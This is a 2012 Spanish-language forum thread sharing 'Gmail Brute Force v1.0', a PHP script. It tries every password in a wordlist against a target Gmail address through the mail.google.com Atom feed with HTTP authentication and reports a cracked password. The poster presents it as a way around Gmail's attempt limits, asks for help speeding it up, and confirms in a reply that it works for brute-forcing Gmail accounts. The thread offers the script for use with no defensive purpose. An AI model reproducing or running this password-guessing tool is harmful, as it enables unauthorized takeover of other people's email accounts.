Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Gmail Brute Force v1.0 - Sec-w.com

  • 2 Respuestas
  • 2456 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Aryenal.Bt

  • *
  • Underc0der
  • Mensajes: 262
  • Actividad:
    0%
  • Reputación 0
  • "El hombre creyéndose sabio se volvió necio"
    • Ver Perfil
    • Email
« en: Octubre 09, 2012, 11:44:24 pm »
Últimamente estoy interesado en el tema de Fuerza Bruta a Correos Electrónicos,  el primero de mi lista es Gmail, así que he probado
algunas aplicaciones que realizan fuerza bruta como: Hydra, Brutus, Bruter entre otros.

Se sabe que Gmail solo te da 5 o 7 intentos para colocar tu passord, luego de eso te pide comprobaciones a través de códigos. así que de que
valdría hacer un ataque de Fuerza Bruta con un diccionario de 5 a 7 palabras por día (seria algo desesperante), pero aun no es el fin.
asi que para ese problema se podria utilizar cURL http://www.php.net/manual/es/intro.curl.php con la cual los intentos de 5 a 7 para probar un posible password desaparecen.

Gmail Brute Force V1.0, Creada por s3n4t00r de sec-w.com hace posible esto:



lo he testeado y va bien, pero como ya saben no todo es fácil, los correos de Gmail que están protegidos por la famosa seguridad de
2 o 3 pasos (no recuerdo bien XD) <la cual es o consiste en enviarte o llamarte y facilitarte un código de (06) dígitos al un numero de
celular para confirmar el acceso de la persona legitima>; No son blancos para esta aplicación.

asi que sin mas preambulos les dejo el codigo:

Código: PHP
  1. <?php
  2.  
  3. /*
  4.  
  5.    author..............: s3n4t00r
  6.    home................: sec-w.com
  7.    Toolname............: Gmail Brute Force v1.0
  8.    Demonstration ......: http://youtu.be/QdEvoJdENBY
  9.  
  10.  
  11.  
  12. */
  13.  
  14.  
  15. #---------------------------------------->
  16. # ToolName      : Gmail Brute Force v1.0
  17. #
  18. # Programmed    : s3n4t00r
  19. #
  20. # Home          : Sec-w.com
  21. #---------------------------------------->
  22. \n\n");
  23.  
  24.  
  25. if ($argc < 3)
  26. {
  27.             print "\nUsage......: php $argv[0] <mail> <list pass>\n";
  28.             print "\nExample....: php $argv[0] s3n4t00r@gmail.com pass.txt \n";
  29.             die();
  30. }
  31.  
  32.  
  33. function sws_gmail($mail,$pass){
  34.  
  35. $ch = curl_init();
  36. curl_setopt($ch, CURLOPT_URL, 'https://mail.google.com/mail/feed/atom');
  37. curl_setopt($ch, CURLOPT_USERPWD, $mail.':'.$pass);
  38. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
  39. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  40. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  41. curl_setopt($ch, CURLOPT_TIMEOUT, 4);
  42. $result = curl_exec($ch);
  43. $returnCode = (int)curl_getinfo($ch, CURLINFO_HTTP_CODE);
  44.  
  45. return $returnCode;
  46. }
  47.  
  48. list($mail, $list,) = array($argv[1], $argv[2]);
  49.  
  50. $lists = file($list);
  51.  
  52. foreach ($lists as $pass){
  53.  
  54.          $gmail = sws_gmail($mail,trim($pass));
  55.          echo "[+]Testing -> ".$pass."\n";
  56.          if($gmail == '200'){
  57.  
  58.             echo "[+]Password Cracked -> ".$pass;
  59.             die("\n");
  60.          }
  61. }
  62.  
  63. die("# Failed");
  64.  
  65. ?>


Creditos: s3n4t00r

Saludos.

PD: si alguno de ustedes sabrían como mejorar el código, especialmente en la parte de rapidez en las comprobaciones
       de los password, seria algo genial.

Atte. Aryenal
« Última modificación: Octubre 25, 2013, 11:21:49 pm por Expermicid »

Desconectado zoro248

  • *
  • Underc0der
  • Mensajes: 242
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #1 en: Octubre 10, 2012, 01:49:39 am »
Entonces con esta aplicacion se podria hacer ataques de fuerza bruta en gmail?

Desconectado Aryenal.Bt

  • *
  • Underc0der
  • Mensajes: 262
  • Actividad:
    0%
  • Reputación 0
  • "El hombre creyéndose sabio se volvió necio"
    • Ver Perfil
    • Email
« Respuesta #2 en: Octubre 10, 2012, 03:20:36 pm »
Entonces con esta aplicacion se podria hacer ataques de fuerza bruta en gmail?
si.

 

¿Te gustó el post? COMPARTILO!